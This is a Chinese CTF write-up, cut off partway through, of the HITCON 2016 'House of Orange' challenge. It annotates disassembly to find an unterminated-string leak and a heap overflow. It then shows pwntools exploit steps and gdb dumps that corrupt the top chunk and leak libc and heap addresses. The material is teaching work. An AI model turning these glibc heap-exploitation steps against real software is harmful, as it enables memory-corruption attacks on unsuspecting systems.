mirror of
synced 2025-03-01 03:27:32 +07:00
875 lines
42 KiB
875 lines
42 KiB
# 6.1.24 pwn HITCONCTF2016 House_of_Orange
- [题目复现](#题目复现)
- [题目解析](#题目解析)
- [漏洞利用](#漏洞利用)
- [参考资料](#参考资料)
## 题目复现
$ file houseoforange
houseoforange: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=a58bda41b65d38949498561b0f2b976ce5c0c301, stripped
$ checksec -f houseoforange
Full RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH Yes 1 3 houseoforange
$ strings libc-2.23.so | grep "GNU C"
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al.
Compiled by GNU CC version 5.3.1 20160413.
64 位程序,保护全开,默认开启 ASLR。
在 Ubuntu16.04 上玩一下:
$ ./houseoforange
@ House of Orange @
1. Build the house
2. See the house
3. Upgrade the house
4. Give up
Your choice : 1 <-- Build a house
Length of name :20
Price of Orange:1
1. Red
2. Green
3. Yellow
4. Blue
5. Purple
6. Cyan
7. White
Color of Orange:1
@ House of Orange @
1. Build the house
2. See the house
3. Upgrade the house
4. Give up
Your choice : 3 <-- Upgrade the house
Length of name :10
Price of Orange: +++++++++++++++++++++++++++++++++++++
1. Red
2. Green
3. Yellow
4. Blue
5. Purple
6. Cyan
7. White
Color of Orange: 1
@ House of Orange @
1. Build the house
2. See the house
3. Upgrade the house
4. Give up
Your choice : 2 <-- See the house
Price of orange : 0
/ . . . . . . . \
/ . . . . . . . . \
|. 乂 . . . 乂. .|
\ . . . . . . . . |
\. . . . . . . . ./
\ . . . *. . . /
@ House of Orange @
1. Build the house
2. See the house
3. Upgrade the house
4. Give up
Your choice : 4
give up
程序允许我们对 house 进行 Build、See 和 Upgrade 的操作。可以看到在 See 的时候似乎有点问题,"A"的字符串应该是 Upgrade 之前的,但这里还是被打印了出来,猜测可能存在信息泄露,需要重点关注。
## 题目解析
### Build the house
[0x00000af0]> pdf @ sub.Too_many_house_d37
/ (fcn) sub.Too_many_house_d37 431
| sub.Too_many_house_d37 (int arg_7h, int arg_1000h, int arg_ddaah);
| ; var int local_18h @ rbp-0x18
| ; var int local_14h @ rbp-0x14
| ; var int local_10h @ rbp-0x10
| ; var int local_8h @ rbp-0x8
| ; var int local_0h @ rbp-0x0
| ; arg int arg_7h @ rbp+0x7
| ; arg int arg_1000h @ rbp+0x1000
| ; arg int arg_ddaah @ rbp+0xddaa
| ; CALL XREF from 0x000013fd (main)
| 0x00000d37 push rbp
| 0x00000d38 mov rbp, rsp
| 0x00000d3b sub rsp, 0x20
| 0x00000d3f lea rax, [0x00203070] ; [0x00203070] 存放 house_num
| 0x00000d46 mov eax, dword [rax]
| 0x00000d48 cmp eax, 3
| ,=< 0x00000d4b jbe 0xd63 ; 最多 4 个 house
| | 0x00000d4d lea rdi, str.Too_many_house ; 0x1e3f ; "Too many house"
| | 0x00000d54 call sym.imp.puts ; int puts(const char *s)
| | 0x00000d59 mov edi, 1
| | 0x00000d5e call sym.imp._exit ; void _exit(int status)
| | ; CODE XREF from 0x00000d4b (sub.Too_many_house_d37)
| `-> 0x00000d63 mov edi, 0x10
| 0x00000d68 call sym.imp.malloc ; rax = malloc(0x10) 给 house struct 分配空间
| 0x00000d6d mov qword [local_10h], rax ; house 的地址放到 [local_10h]
| 0x00000d71 lea rdi, str.Length_of_name_: ; 0x1e4e ; "Length of name :"
| 0x00000d78 mov eax, 0
| 0x00000d7d call sym.imp.printf ; int printf(const char *format)
| 0x00000d82 mov eax, 0
| 0x00000d87 call sub.__read_chk_c65 ; 读入 length
| 0x00000d8c mov dword [local_18h], eax ; length 放到 [local_18h]
| 0x00000d8f cmp dword [local_18h], 0x1000 ; [0x1000:4]=0x2062058d
| ,=< 0x00000d96 jbe 0xd9f ; length 小于等于 0x1000 时跳转
| | 0x00000d98 mov dword [local_18h], 0x1000 ; 否则 length 设置为 0x1000
| | ; CODE XREF from 0x00000d96 (sub.Too_many_house_d37)
| `-> 0x00000d9f mov eax, dword [local_18h]
| 0x00000da2 mov rdi, rax
| 0x00000da5 call sym.imp.malloc ; rax = malloc(length) 给 name 分配空间
| 0x00000daa mov rdx, rax ; name 的地址放到 rdx
| 0x00000dad mov rax, qword [local_10h] ; 取出 house
| 0x00000db1 mov qword [rax + 8], rdx ; house->name = name
| 0x00000db5 mov rax, qword [local_10h]
| 0x00000db9 mov rax, qword [rax + 8] ; 取出 house->name
| 0x00000dbd test rax, rax
| ,=< 0x00000dc0 jne 0xdd8 ; house->name 不为空时跳转
| | 0x00000dc2 lea rdi, str.Malloc_error ; 否则报错并退出
| | 0x00000dc9 call sym.imp.puts ; int puts(const char *s)
| | 0x00000dce mov edi, 1
| | 0x00000dd3 call sym.imp._exit ; void _exit(int status)
| | ; CODE XREF from 0x00000dc0 (sub.Too_many_house_d37)
| `-> 0x00000dd8 lea rdi, str.Name_: ; 0x1e70 ; "Name :"
| 0x00000ddf mov eax, 0
| 0x00000de4 call sym.imp.printf ; int printf(const char *format)
| 0x00000de9 mov rax, qword [local_10h]
| 0x00000ded mov rax, qword [rax + 8] ; 取出 house->name
| 0x00000df1 mov edx, dword [local_18h] ; 取出 length
| 0x00000df4 mov esi, edx
| 0x00000df6 mov rdi, rax
| 0x00000df9 call sub.read_c20 ; 调用 read_c20(house->name, length) 读入 name
| 0x00000dfe mov esi, 8
| 0x00000e03 mov edi, 1
| 0x00000e08 call sym.imp.calloc ; rax = calloc(1, 8) 分配一个 8 bytes 的空间作为 orange struct
| 0x00000e0d mov qword [local_8h], rax ; orange 的地址放到 [local_8h]
| 0x00000e11 lea rdi, [0x00001e77] ; "Price of Orange:"
| 0x00000e18 mov eax, 0
| 0x00000e1d call sym.imp.printf ; int printf(const char *format)
| 0x00000e22 mov eax, 0
| 0x00000e27 call sub.__read_chk_c65 ; 读入 price
| 0x00000e2c mov edx, eax ; price 赋值给 edx
| 0x00000e2e mov rax, qword [local_8h] ; 取出 orange
| 0x00000e32 mov dword [rax], edx ; orange->price = price
| 0x00000e34 mov eax, 0
| 0x00000e39 call sub._cc4 ; 打印 color 菜单
| 0x00000e3e lea rdi, [0x00001e88] ; "Color of Orange:"
| 0x00000e45 mov eax, 0
| 0x00000e4a call sym.imp.printf ; int printf(const char *format)
| 0x00000e4f mov eax, 0
| 0x00000e54 call sub.__read_chk_c65 ; 读入 color
| 0x00000e59 mov dword [local_14h], eax ; color 放到 [local_14h]
| 0x00000e5c cmp dword [local_14h], 0xddaa ; [0xddaa:4]=-1
| ,=< 0x00000e63 je 0xe87 ; color 等于 0xddaa 时跳转
| | 0x00000e65 cmp dword [local_14h], 0
| ,==< 0x00000e69 jle 0xe71
| || 0x00000e6b cmp dword [local_14h], 7 ; [0x7:4]=0
| ,===< 0x00000e6f jle 0xe87
| ||| ; CODE XREF from 0x00000e69 (sub.Too_many_house_d37)
| |`--> 0x00000e71 lea rdi, str.No_such_color ; 0x1e99 ; "No such color"
| | | 0x00000e78 call sym.imp.puts ; int puts(const char *s)
| | | 0x00000e7d mov edi, 1
| | | 0x00000e82 call sym.imp._exit ; 当 color != 0xddaa && (color <= 0 || color > 7) 时退出程序
| | | ; CODE XREF from 0x00000e63 (sub.Too_many_house_d37)
| | | ; CODE XREF from 0x00000e6f (sub.Too_many_house_d37)
| `-`-> 0x00000e87 cmp dword [local_14h], 0xddaa ; [0xddaa:4]=-1
| ,=< 0x00000e8e jne 0xe9c ; color 不等于 0 时跳转
| | 0x00000e90 mov rax, qword [local_8h] ; 否则取出 orange
| | 0x00000e94 mov edx, dword [local_14h] ; 取出 color
| | 0x00000e97 mov dword [rax + 4], edx ; orange->color = color
| ,==< 0x00000e9a jmp 0xea9
| || ; CODE XREF from 0x00000e8e (sub.Too_many_house_d37)
| |`-> 0x00000e9c mov eax, dword [local_14h] ; 取出 color
| | 0x00000e9f lea edx, [rax + 0x1e] ; edx = color + 0x1e
| | 0x00000ea2 mov rax, qword [local_8h] ; 取出 orange
| | 0x00000ea6 mov dword [rax + 4], edx ; orange->color = edx == color + 0x1e
| | ; CODE XREF from 0x00000e9a (sub.Too_many_house_d37)
| `--> 0x00000ea9 mov rax, qword [local_10h] ; 取出 house
| 0x00000ead mov rdx, qword [local_8h] ; 取出 orange
| 0x00000eb1 mov qword [rax], rdx ; house->org = orange
| 0x00000eb4 lea rax, [0x00203068]
| 0x00000ebb mov rdx, qword [local_10h]
| 0x00000ebf mov qword [rax], rdx ; 将 house 的地址放到 [0x00203068]
| 0x00000ec2 lea rax, [0x00203070]
| 0x00000ec9 mov eax, dword [rax]
| 0x00000ecb lea edx, [rax + 1] ; house_num += 1
| 0x00000ece lea rax, [0x00203070]
| 0x00000ed5 mov dword [rax], edx
| 0x00000ed7 lea rdi, str.Finish ; 0x1ea7 ; "Finish"
| 0x00000ede call sym.imp.puts ; int puts(const char *s)
| 0x00000ee3 nop
| 0x00000ee4 leave
\ 0x00000ee5 ret
struct orange{
int price;
int color;
} orange;
struct house {
orange *org;
char *name;
} house;
Build 最多可以进行 4 次,整个过程有 2 个 malloc 和 1 个 calloc:
- `malloc(0x10)`:给 house struct 分配空间
- `malloc(length)`:给 name 分配空间,其中 length 来自用户输入,如果大于 0x1000,则按照 0x1000 处理。
- `calloc(1, 8)`:给 orange struct 分配空间
那么我们再来看一下用于读入 name 的函数:
[0x00000af0]> pdf @ sub.read_c20
/ (fcn) sub.read_c20 69
| sub.read_c20 ();
| ; var int local_1ch @ rbp-0x1c
| ; var int local_18h @ rbp-0x18
| ; var int local_4h @ rbp-0x4
| ; var int local_0h @ rbp-0x0
| ; CALL XREF from 0x00000df9 (sub.Too_many_house_d37)
| ; CALL XREF from 0x00001119 (sub.You_can_t_upgrade_more_7c)
| 0x00000c20 push rbp
| 0x00000c21 mov rbp, rsp
| 0x00000c24 sub rsp, 0x20
| 0x00000c28 mov qword [local_18h], rdi
| 0x00000c2c mov dword [local_1ch], esi
| 0x00000c2f mov edx, dword [local_1ch]
| 0x00000c32 mov rax, qword [local_18h]
| 0x00000c36 mov rsi, rax
| 0x00000c39 mov edi, 0
| 0x00000c3e call sym.imp.read ; 调用 read(0, house->name, length) 读入 name
| 0x00000c43 mov dword [local_4h], eax
| 0x00000c46 cmp dword [local_4h], 0
| ,=< 0x00000c4a jg 0xc62
| | 0x00000c4c lea rdi, str.read_error ; 0x14c8 ; "read error"
| | 0x00000c53 call sym.imp.puts ; int puts(const char *s)
| | 0x00000c58 mov edi, 1
| | 0x00000c5d call sym.imp._exit ; void _exit(int status)
| | ; CODE XREF from 0x00000c4a (sub.read_c20)
| `-> 0x00000c62 nop
| 0x00000c63 leave
\ 0x00000c64 ret
这个函数在读入 length 长度的字符串后,没有在末尾加上 `\x00` 截断,正如我们上面看到的,可能导致信息泄露。
### See the house
[0x00000af0]> pdf @ sub.Name_of_house_:__s_ee6
/ (fcn) sub.Name_of_house_:__s_ee6 406
| sub.Name_of_house_:__s_ee6 ();
| ; CALL XREF from 0x00001409 (main)
| 0x00000ee6 push rbp
| 0x00000ee7 mov rbp, rsp
| 0x00000eea lea rax, [0x00203068]
| 0x00000ef1 mov rax, qword [rax] ; 取出 house
| 0x00000ef4 test rax, rax
| ,=< 0x00000ef7 je 0x106e ; 如果不存在 house,函数返回
| | 0x00000efd lea rax, [0x00203068]
| | 0x00000f04 mov rax, qword [rax] ; 取出 house
| | 0x00000f07 mov rax, qword [rax] ; 取出 house->org
| | 0x00000f0a mov eax, dword [rax + 4] ; 取出 house->org->color,即 orange->color
| | 0x00000f0d cmp eax, 0xddaa
| ,==< 0x00000f12 jne 0xf9d ; orange->color 不等于 0xddaa 时跳转
| || 0x00000f18 lea rax, [0x00203068]
| || 0x00000f1f mov rax, qword [rax]
| || 0x00000f22 mov rax, qword [rax + 8] ; 取出 house->name
| || 0x00000f26 mov rsi, rax
| || 0x00000f29 lea rdi, str.Name_of_house_:__s ; 0x1eae ; "Name of house : %s\n"
| || 0x00000f30 mov eax, 0
| || 0x00000f35 call sym.imp.printf ; 打印 house->name
| || 0x00000f3a lea rax, [0x00203068]
| || 0x00000f41 mov rax, qword [rax]
| || 0x00000f44 mov rax, qword [rax]
| || 0x00000f47 mov eax, dword [rax] ; 取出 orange->price
| || 0x00000f49 mov esi, eax
| || 0x00000f4b lea rdi, str.Price_of_orange_:__d ; 0x1ec2 ; "Price of orange : %d\n"
| || 0x00000f52 mov eax, 0
| || 0x00000f57 call sym.imp.printf ; 打印 orange->price
| || 0x00000f5c call sym.imp.rand ; rand_num = rand() 生成一个随机数
| || 0x00000f61 mov edx, eax
| || 0x00000f63 mov eax, edx
| || 0x00000f65 sar eax, 0x1f
| || 0x00000f68 shr eax, 0x1d
| || 0x00000f6b add edx, eax
| || 0x00000f6d and edx, 7 ; rand_num % 8
| || 0x00000f70 sub edx, eax
| || 0x00000f72 mov eax, edx
| || 0x00000f74 mov edx, eax
| || 0x00000f76 lea rax, [0x00203080]
| || 0x00000f7d movsxd rdx, edx
| || 0x00000f80 mov rax, qword [rax + rdx*8] ; rax = [0x00203080 + rand_num % 8]
| || 0x00000f84 mov rsi, rax
| || 0x00000f87 lea rdi, str.e_01_38_5_214m_s_e_0m ; 0x1ed8
| || 0x00000f8e mov eax, 0
| || 0x00000f93 call sym.imp.printf ; 打印 orange 图案
| ,===< 0x00000f98 jmp 0x107a ; 跳转,函数返回
| |`--> 0x00000f9d lea rax, [0x00203068]
| | | 0x00000fa4 mov rax, qword [rax]
| | | 0x00000fa7 mov rax, qword [rax]
| | | 0x00000faa mov eax, dword [rax + 4] ; 取出 orange->color
| | | 0x00000fad cmp eax, 0x1e
| |,==< 0x00000fb0 jle 0xfc7 ; orange->color 小于等于 0x1e 时跳转,程序退出
| ||| 0x00000fb2 lea rax, [0x00203068]
| ||| 0x00000fb9 mov rax, qword [rax]
| ||| 0x00000fbc mov rax, qword [rax]
| ||| 0x00000fbf mov eax, dword [rax + 4] ; 否则取出 orange->color
| ||| 0x00000fc2 cmp eax, 0x25 ; '%'
| ,====< 0x00000fc5 jle 0xfdd ; orange->color 小于等于 0xfdd 时跳转
| |||| ; CODE XREF from 0x00000fb0 (sub.Name_of_house_:__s_ee6)
| ||`--> 0x00000fc7 lea rdi, str.Color_corruption ; 0x1eee ; "Color corruption!"
| || | 0x00000fce call sym.imp.puts ; int puts(const char *s)
| || | 0x00000fd3 mov edi, 1
| || | 0x00000fd8 call sym.imp._exit ; void _exit(int status)
| || | ; CODE XREF from 0x00000fc5 (sub.Name_of_house_:__s_ee6)
| `----> 0x00000fdd lea rax, [0x00203068]
| | | 0x00000fe4 mov rax, qword [rax]
| | | 0x00000fe7 mov rax, qword [rax + 8] ; 取出 house->name
| | | 0x00000feb mov rsi, rax
| | | 0x00000fee lea rdi, str.Name_of_house_:__s ; 0x1eae ; "Name of house : %s\n"
| | | 0x00000ff5 mov eax, 0
| | | 0x00000ffa call sym.imp.printf ; 打印 house->name
| | | 0x00000fff lea rax, [0x00203068]
| | | 0x00001006 mov rax, qword [rax]
| | | 0x00001009 mov rax, qword [rax]
| | | 0x0000100c mov eax, dword [rax] ; 取出 orange->price
| | | 0x0000100e mov esi, eax
| | | 0x00001010 lea rdi, str.Price_of_orange_:__d ; 0x1ec2 ; "Price of orange : %d\n"
| | | 0x00001017 mov eax, 0
| | | 0x0000101c call sym.imp.printf ; 打印 house->price
| | | 0x00001021 call sym.imp.rand ; rand_num = rand() 生成一个随机数
| | | 0x00001026 mov edx, eax
| | | 0x00001028 mov eax, edx
| | | 0x0000102a sar eax, 0x1f
| | | 0x0000102d shr eax, 0x1d
| | | 0x00001030 add edx, eax
| | | 0x00001032 and edx, 7 ; rand_num % 8
| | | 0x00001035 sub edx, eax
| | | 0x00001037 mov eax, edx
| | | 0x00001039 mov edx, eax
| | | 0x0000103b lea rax, [0x00203080]
| | | 0x00001042 movsxd rdx, edx
| | | 0x00001045 mov rdx, qword [rax + rdx*8] ; rdx = [0x00203080 + rand_num % 8]
| | | 0x00001049 lea rax, [0x00203068]
| | | 0x00001050 mov rax, qword [rax]
| | | 0x00001053 mov rax, qword [rax]
| | | 0x00001056 mov eax, dword [rax + 4] ; 取出 orange->color
| | | 0x00001059 mov esi, eax
| | | 0x0000105b lea rdi, str.e__dm_s_e_0m ; 0x1f00
| | | 0x00001062 mov eax, 0
| | | 0x00001067 call sym.imp.printf ; 打印 orange 图案
| |,==< 0x0000106c jmp 0x107a
| ||| ; CODE XREF from 0x00000ef7 (sub.Name_of_house_:__s_ee6)
| ||`-> 0x0000106e lea rdi, str.No_such_house ; 0x1f0d ; "No such house !"
| || 0x00001075 call sym.imp.puts ; int puts(const char *s)
| || ; CODE XREF from 0x00000f98 (sub.Name_of_house_:__s_ee6)
| || ; CODE XREF from 0x0000106c (sub.Name_of_house_:__s_ee6)
| ``--> 0x0000107a pop rbp
\ 0x0000107b ret
See 会打印出 house->name,orange->price 和 orange 图案。
### Upgrade the house
[0x00000af0]> pdf @ sub.You_can_t_upgrade_more_7c
/ (fcn) sub.You_can_t_upgrade_more_7c 379
| sub.You_can_t_upgrade_more_7c (int arg_7h, int arg_1000h, int arg_ddaah);
| ; var int local_18h @ rbp-0x18
| ; var int local_14h @ rbp-0x14
| ; var int local_0h @ rbp-0x0
| ; arg int arg_7h @ rbp+0x7
| ; arg int arg_1000h @ rbp+0x1000
| ; arg int arg_ddaah @ rbp+0xddaa
| ; CALL XREF from 0x00001415 (main)
| 0x0000107c push rbp
| 0x0000107d mov rbp, rsp
| 0x00001080 push rbx
| 0x00001081 sub rsp, 0x18
| 0x00001085 lea rax, [0x00203074]
| 0x0000108c mov eax, dword [rax] ; 取出 upgrade_num,初始值为 0
| 0x0000108e cmp eax, 2 ; 最多修改 3 次
| ,=< 0x00001091 jbe 0x10a4 ; upgrade_num 小于等于 2 时跳转
| | 0x00001093 lea rdi, str.You_can_t_upgrade_more ; 0x1f1d ; "You can't upgrade more"
| | 0x0000109a call sym.imp.puts ; int puts(const char *s)
| ,==< 0x0000109f jmp 0x11f0 ; 否则函数返回
| || ; CODE XREF from 0x00001091 (sub.You_can_t_upgrade_more_7c)
| |`-> 0x000010a4 lea rax, [0x00203068]
| | 0x000010ab mov rax, qword [rax] ; 取出 house
| | 0x000010ae test rax, rax
| |,=< 0x000010b1 jne 0x10c4 ; house 不为 0 时跳转
| || 0x000010b3 lea rdi, str.No_such_house ; 0x1f0d ; "No such house !"
| || 0x000010ba call sym.imp.puts ; int puts(const char *s)
| ,===< 0x000010bf jmp 0x11f0 ; 否则函数返回
| ||| ; CODE XREF from 0x000010b1 (sub.You_can_t_upgrade_more_7c)
| ||`-> 0x000010c4 lea rdi, str.Length_of_name_: ; 0x1e4e ; "Length of name :"
| || 0x000010cb mov eax, 0
| || 0x000010d0 call sym.imp.printf ; int printf(const char *format)
| || ; DATA XREF from 0x00000d06 (sub._cc4)
| || 0x000010d5 mov eax, 0
| || 0x000010da call sub.__read_chk_c65 ; 读入 length
| || 0x000010df mov dword [local_18h], eax ; 将 length 放到 [local_18h]
| || 0x000010e2 cmp dword [local_18h], 0x1000 ; [0x1000:4]=0x2062058d
| ||,=< 0x000010e9 jbe 0x10f2 ; length 小于等于 0x1000 时跳转
| ||| 0x000010eb mov dword [local_18h], 0x1000 ; 否则 length 赋值为 0x1000
| ||| ; CODE XREF from 0x000010e9 (sub.You_can_t_upgrade_more_7c)
| ||`-> 0x000010f2 lea rdi, str.Name: ; 0x1f34 ; "Name:"
| || 0x000010f9 mov eax, 0
| || 0x000010fe call sym.imp.printf ; int printf(const char *format)
| || 0x00001103 lea rax, [0x00203068]
| || 0x0000110a mov rax, qword [rax]
| || 0x0000110d mov rax, qword [rax + 8] ; 取出 house->name
| || 0x00001111 mov edx, dword [local_18h] ; 取出 length
| || 0x00001114 mov esi, edx
| || 0x00001116 mov rdi, rax
| || 0x00001119 call sub.read_c20 ; 调用 read_c20(house->name, length) 读入 name
| || 0x0000111e lea rdi, str.Price_of_Orange: ; 0x1f3a ; "Price of Orange: "
| || 0x00001125 mov eax, 0
| || 0x0000112a call sym.imp.printf ; int printf(const char *format)
| || 0x0000112f lea rax, [0x00203068]
| || 0x00001136 mov rax, qword [rax]
| || 0x00001139 mov rbx, qword [rax] ; 取出 house->org,即 orange
| || 0x0000113c mov eax, 0
| || 0x00001141 call sub.__read_chk_c65 ; 读入 price
| || 0x00001146 mov dword [rbx], eax ; orange->price = price
| || 0x00001148 mov eax, 0
| || 0x0000114d call sub._cc4 ; 打印 color 菜单
| || 0x00001152 lea rdi, str.Color_of_Orange: ; 0x1f4c ; "Color of Orange: "
| || 0x00001159 mov eax, 0
| || 0x0000115e call sym.imp.printf ; int printf(const char *format)
| || 0x00001163 mov eax, 0
| || 0x00001168 call sub.__read_chk_c65 ; 读入 color
| || 0x0000116d mov dword [local_14h], eax ; 将 color 放到 [local_14h]
| || 0x00001170 cmp dword [local_14h], 0xddaa ; [0xddaa:4]=-1
| ||,=< 0x00001177 je 0x119b ; color 等于 0xddaa 时跳转
| ||| 0x00001179 cmp dword [local_14h], 0
| ,====< 0x0000117d jle 0x1185
| |||| 0x0000117f cmp dword [local_14h], 7 ; [0x7:4]=0
| ,=====< 0x00001183 jle 0x119b
| ||||| ; CODE XREF from 0x0000117d (sub.You_can_t_upgrade_more_7c)
| |`----> 0x00001185 lea rdi, str.No_such_color ; 0x1e99 ; "No such color"
| | ||| 0x0000118c call sym.imp.puts ; int puts(const char *s)
| | ||| 0x00001191 mov edi, 1
| | ||| 0x00001196 call sym.imp._exit ; 当 color != 0xddaa && (color <= 0 || color > 7) 时退出程序
| | ||| ; CODE XREF from 0x00001183 (sub.You_can_t_upgrade_more_7c)
| | ||| ; CODE XREF from 0x00001177 (sub.You_can_t_upgrade_more_7c)
| `---`-> 0x0000119b cmp dword [local_14h], 0xddaa ; [0xddaa:4]=-1
| ||,=< 0x000011a2 jne 0x11b9 ; color 不等于 0xddaa 时跳转
| ||| 0x000011a4 lea rax, [0x00203068]
| ||| 0x000011ab mov rax, qword [rax]
| ||| 0x000011ae mov rax, qword [rax] ; 否则取出 house->org,即 orange
| ||| 0x000011b1 mov edx, dword [local_14h] ; 取出 color
| ||| 0x000011b4 mov dword [rax + 4], edx ; orange->color = color
| ,====< 0x000011b7 jmp 0x11cf ; 跳转
| |||| ; CODE XREF from 0x000011a2 (sub.You_can_t_upgrade_more_7c)
| |||`-> 0x000011b9 lea rax, [0x00203068]
| ||| 0x000011c0 mov rax, qword [rax]
| ||| 0x000011c3 mov rax, qword [rax] ; 取出 house->org,即 orange
| ||| 0x000011c6 mov edx, dword [local_14h] ; 取出 color
| ||| 0x000011c9 add edx, 0x1e
| ||| 0x000011cc mov dword [rax + 4], edx ; orange->color = color + 0x1e
| ||| ; CODE XREF from 0x000011b7 (sub.You_can_t_upgrade_more_7c)
| `----> 0x000011cf lea rax, [0x00203074]
| || 0x000011d6 mov eax, dword [rax] ; 取出 upgrade_num
| || 0x000011d8 lea edx, [rax + 1] ; upgrade_num += 1
| || 0x000011db lea rax, [0x00203074]
| || 0x000011e2 mov dword [rax], edx
| || 0x000011e4 lea rdi, str.Finish ; 0x1ea7 ; "Finish"
| || 0x000011eb call sym.imp.puts ; int puts(const char *s)
| || ; CODE XREF from 0x0000109f (sub.You_can_t_upgrade_more_7c)
| || ; CODE XREF from 0x000010bf (sub.You_can_t_upgrade_more_7c)
| ``--> 0x000011f0 add rsp, 0x18
| 0x000011f4 pop rbx
| 0x000011f5 pop rbp
\ 0x000011f6 ret
Upgrade 最多可以进行 3 次,当确认 house 存在后,就直接在 orange->name 的地方读入长度为 length 的 name,然后读入新的 price 和 color。新的 length 同样来自用户输入,如果大于 0x1000,则按照 0x1000 处理。
这里的问题在于程序没有将新 length 与旧 length 做任何比较,如果新 length 大于 旧 length,那么将导致堆溢出。
## 漏洞利用
和常见的堆利用题目不同的是,这题只有 malloc 而没有 free,于是很多利用方法都用不了。当然这题是独创了一种 house-of-orange 的利用方法,这种方法利用堆溢出修改 `_IO_list_all` 结构体,从而改变程序流,前提是能够泄漏堆和 libc,泄露的方法是触发位于 `sysmalloc()` 中的 `_int_free()` 将 top chunk 释放到 unsorted bin 中(详细内容参考章节 3.1.8 和 4.13)。
### overwrite top chunk
def overwrite_top():
build(0x10, 'AAAA')
payload = "A" * 0x30
payload += p64(0) + p64(0xfa1) # top chunk header
upgrade(0x41, payload)
第一步,覆盖 top chunk 的 size 域,以触发 `sysmalloc()`。创建第一个 house:
gdb-peda$ x/16gx 0x555555758010-0x10
0x555555758000: 0x0000000000000000 0x0000000000000021 <-- house 1
0x555555758010: 0x0000555555758050 0x0000555555758030
0x555555758020: 0x0000000000000000 0x0000000000000021 <-- name 1
0x555555758030: 0x0000000a41414141 0x0000000000000000
0x555555758040: 0x0000000000000000 0x0000000000000021 <-- orange 1
0x555555758050: 0x0000001f00000001 0x0000000000000000
0x555555758060: 0x0000000000000000 0x0000000000020fa1 <-- top chunk
0x555555758070: 0x0000000000000000 0x0000000000000000
根据一定的规则修改 size,简单说就是这里 top chunk size 是 `0x20fa1`,那就修改为 `0xfa1`:
gdb-peda$ x/16gx 0x555555758010-0x10
0x555555758000: 0x0000000000000000 0x0000000000000021 <-- house 1
0x555555758010: 0x0000555555758050 0x0000555555758030
0x555555758020: 0x0000000000000000 0x0000000000000021 <-- name 1
0x555555758030: 0x4141414141414141 0x4141414141414141
0x555555758040: 0x4141414141414141 0x4141414141414141 <-- orange 1
0x555555758050: 0x0000001f00000001 0x4141414141414141
0x555555758060: 0x0000000000000000 0x0000000000000fa1 <-- fake top chunk
0x555555758070: 0x000000000000000a 0x0000000000000000
### leak libc
def leak_libc():
global libc_base
build(0x1000, 'AAAA') # _int_free in sysmalloc
build(0x400, 'A' * 7) # large chunk
libc_base = u64(see()) - 0x3c4188 # fd pointer
log.info("libc_base address: 0x%x" % libc_base)
接下来分配一个大于 top chunk,小于 `mp_.mmap_threshold` 的 large chunk,此时将触发 `sysmalloc()` 中的 `_int_free()`,top chunk 将被释放到 unsorted bin 中,同时新的 top chunk 将由扩展方式分配出来:
gdb-peda$ x/26gx 0x555555758010-0x10
0x555555758000: 0x0000000000000000 0x0000000000000021 <-- house 1
0x555555758010: 0x0000555555758050 0x0000555555758030
0x555555758020: 0x0000000000000000 0x0000000000000021 <-- name 1
0x555555758030: 0x4141414141414141 0x4141414141414141
0x555555758040: 0x4141414141414141 0x4141414141414141 <-- orange 1
0x555555758050: 0x0000001f00000001 0x4141414141414141
0x555555758060: 0x0000000000000000 0x0000000000000021 <-- house 2
0x555555758070: 0x0000555555758090 0x0000555555779010
0x555555758080: 0x0000000000000000 0x0000000000000021 <-- orange 2
0x555555758090: 0x0000001f00000001 0x0000000000000000
0x5555557580a0: 0x0000000000000000 0x0000000000000f41 <-- old top chunk
0x5555557580b0: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x5555557580c0: 0x0000000000000000 0x0000000000000000
gdb-peda$ x/4gx 0x555555779010-0x10
0x555555779000: 0x0000000000000000 0x0000000000001011 <-- name 2
0x555555779010: 0x0000000a41414141 0x0000000000000000
gdb-peda$ x/4gx 0x555555779010-0x10+0x1010
0x55555577a010: 0x0000000000000000 0x0000000000020ff1 <-- new top chunk
0x55555577a020: 0x0000000000000000 0x0000000000000000
可以看到 old top chunk 已经被放到 unsorted bin 中了,其 fd, bk 指针指向 libc。接下来再分配一个 large chunk,这个 chunk 将从 old top chunk 中切下来,剩下的再放回 unsorted bin:
gdb-peda$ x/32gx 0x555555758010-0x10
0x555555758000: 0x0000000000000000 0x0000000000000021 <-- house 1
0x555555758010: 0x0000555555758050 0x0000555555758030
0x555555758020: 0x0000000000000000 0x0000000000000021 <-- name 1
0x555555758030: 0x4141414141414141 0x4141414141414141
0x555555758040: 0x4141414141414141 0x4141414141414141 <-- orange 1
0x555555758050: 0x0000001f00000001 0x4141414141414141
0x555555758060: 0x0000000000000000 0x0000000000000021 <-- house 2
0x555555758070: 0x0000555555758090 0x0000555555779010
0x555555758080: 0x0000000000000000 0x0000000000000021 <-- orange 2
0x555555758090: 0x0000001f00000001 0x0000000000000000
0x5555557580a0: 0x0000000000000000 0x0000000000000021 <-- house 3
0x5555557580b0: 0x00005555557584e0 0x00005555557580d0
0x5555557580c0: 0x0000000000000000 0x0000000000000411 <-- name 3
0x5555557580d0: 0x0a41414141414141 0x00007ffff7dd2188
0x5555557580e0: 0x00005555557580c0 0x00005555557580c0
0x5555557580f0: 0x0000000000000000 0x0000000000000000
gdb-peda$ x/8gx 0x5555557580c0+0x410
0x5555557584d0: 0x0000000000000000 0x0000000000000021 <-- orange 3
0x5555557584e0: 0x0000001f00000001 0x0000000000000000
0x5555557584f0: 0x0000000000000000 0x0000000000000af1 <-- old top chunk
0x555555758500: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
可以看到 name 3 上有遗留的 old top chunk 的 bk 指针。只要将其打印出来,通过计算即可得到 libc 的基址。
### leak heap
def leak_heap():
global heap_addr
upgrade(0x10, 'A' * 15)
heap_addr = u64(see()) - 0xc0 # fd_nextsize pointer
log.info("heap address: 0x%x" % heap_addr)
在上一步中我们还可以看到 name 3 上还有遗留的 fd_nextsize 和 bk_nextsize,这是因为在分配一个 large chunk 时,会先将 unsorted bin 中的 large chunk 取出放到 large bin 中。因为当前 large bin 是空的,所以 chunk 的 fd_nextsize 和 bk_nextsize 都指向自身:
/* maintain large bins in sorted order */
if (fwd != bck)
victim->fd_nextsize = victim->bk_nextsize = victim;
所以这里我们通过修改 name 即可泄露出 heap 地址:
